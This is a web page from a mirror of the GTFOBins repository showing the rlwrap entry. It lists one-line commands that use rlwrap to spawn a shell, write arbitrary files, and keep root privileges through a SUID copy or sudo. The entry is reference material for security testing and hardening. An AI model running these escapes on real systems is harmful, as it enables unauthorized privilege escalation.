This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
e242e92634fca35e6da5a4118c4433f4de9ebec2
GTFOBins.github.io
/
_gtfobins
/
rlwrap.md
Emilio Pinna
dd337b5ddf
Adopt new function names
2018-10-05 18:55:38 +01:00
345 B
Raw
Blame
History
functions
functions
shell
file-write
suid
sudo
code
rlwrap /bin/sh
description
code
This adds timestamps to the output file. This relies on the external `echo` command.
LFILE=file_to_write rlwrap -l "$LFILE" echo DATA
code
./rlwrap -H /dev/null /bin/sh -p
code
sudo rlwrap /bin/sh
Reference in New Issue
View Git Blame
Copy Permalink